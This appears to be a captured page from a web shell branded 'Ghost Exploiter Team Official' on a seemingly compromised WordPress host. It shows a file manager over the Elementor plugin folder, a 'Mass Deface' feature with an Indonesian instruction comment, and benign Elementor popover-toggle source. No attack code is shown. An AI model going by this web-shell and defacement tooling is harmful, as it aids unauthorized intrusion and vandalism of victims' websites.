webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
aminiwrc
/
public_html11
/
wp-content
/
plugins
/
elementor
/
includes
/
controls
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
groups
--
ren
alert.php
1.795KB
edt
ren
animation.php
4.756KB
edt
ren
base-data.php
3.66KB
edt
ren
base-icon-font.php
0.613KB
edt
ren
base-multiple.php
2.03KB
edt
ren
base-ui.php
0.504KB
edt
ren
base-units.php
3.495KB
edt
ren
base.php
3.08KB
edt
ren
box-shadow.php
3.393KB
edt
ren
button.php
1.678KB
edt
ren
choose.php
2.214KB
edt
ren
code.php
1.99KB
edt
ren
color.php
2.035KB
edt
ren
date-time.php
2.036KB
edt
ren
deprecated-notice.php
2.273KB
edt
ren
dimensions.php
4.938KB
edt
ren
divider.php
0.81KB
edt
ren
exit-animation.php
2.542KB
edt
ren
font.php
2.216KB
edt
ren
gallery.php
5.151KB
edt
ren
gaps.php
1.619KB
edt
ren
heading.php
1.316KB
edt
ren
hidden.php
0.926KB
edt
ren
hover-animation.php
4.321KB
edt
ren
icon.php
31.325KB
edt
ren
icons.php
7.665KB
edt
ren
image-dimensions.php
3.708KB
edt
ren
media.php
12.818KB
edt
ren
notice.php
4.071KB
edt
ren
number.php
2.089KB
edt
ren
popover-toggle.php
2.664KB
edt
ren
raw-html.php
1.483KB
edt
ren
repeater.php
4.942KB
edt
ren
section.php
1.318KB
edt
ren
select.php
2.563KB
edt
ren
select2.php
2.716KB
edt
ren
slider.php
3.488KB
edt
ren
structure.php
2.462KB
edt
ren
switcher.php
2.076KB
edt
ren
tab.php
1.006KB
edt
ren
tabs.php
0.922KB
edt
ren
text-shadow.php
3.133KB
edt
ren
text.php
2.104KB
edt
ren
textarea.php
2.006KB
edt
ren
url.php
5.09KB
edt
ren
wp-widget.php
1.346KB
edt
ren
wysiwyg.php
1.734KB
edt
ren
<?php namespace Elementor; if ( ! defined( 'ABSPATH' ) ) { exit; // Exit if accessed directly. } /** * Elementor popover toggle control. * * A base control for creating a popover toggle control. By default displays a toggle * button to open and close a popover. * * @since 1.9.0 */ class Control_Popover_Toggle extends Base_Data_Control { /** * Get popover toggle control type. * * Retrieve the control type, in this case `popover_toggle`. * * @since 1.9.0 * @access public * * @return string Control type. */ public function get_type() { return 'popover_toggle'; } /** * Get popover toggle control default settings. * * Retrieve the default settings of the popover toggle control. Used to * return the default settings while initializing the popover toggle * control. * * @since 1.9.0 * @access protected * * @return array Control default settings. */ protected function get_default_settings() { return [ 'return_value' => 'yes', ]; } /** * Render popover toggle control output in the editor. * * Used to generate the control HTML in the editor using Underscore JS * template. The variables for the class are available using `data` JS * object. * * @since 1.9.0 * @access public */ public function content_template() { ?> <div class="elementor-control-field"> <label class="elementor-control-title">{{{ data.label }}}</label> <div class="elementor-control-input-wrapper"> <input id="<?php $this->print_control_uid(); ?>-custom" class="elementor-control-popover-toggle-toggle" type="radio" name="elementor-choose-{{ data.name }}-{{ data._cid }}" value="{{ data.return_value }}"> <label class="elementor-control-popover-toggle-toggle-label elementor-control-unit-1" for="<?php $this->print_control_uid(); ?>-custom"> <i class="eicon-edit" aria-hidden="true"></i> <span class="elementor-screen-only"><?php echo esc_html__( 'Edit', 'elementor' ); ?></span> </label> <input id="<?php $this->print_control_uid(); ?>-default" class="elementor-control-popover-toggle-reset" type="radio" name="elementor-choose-{{ data.name }}-{{ data._cid }}" value=""> <label class="elementor-control-popover-toggle-reset-label tooltip-target" for="<?php $this->print_control_uid(); ?>-default" data-tooltip="<?php echo esc_attr__( 'Back to default', 'elementor' ); ?>" data-tooltip-pos="s"> <i class="eicon-undo" aria-hidden="true"></i> <span class="elementor-screen-only"><?php echo esc_html__( 'Back to default', 'elementor' ); ?></span> </label> </div> </div> <# if ( data.description ) { #> <div class="elementor-control-field-description">{{{ data.description }}}</div> <# } #> <?php } }
<=Back
Liking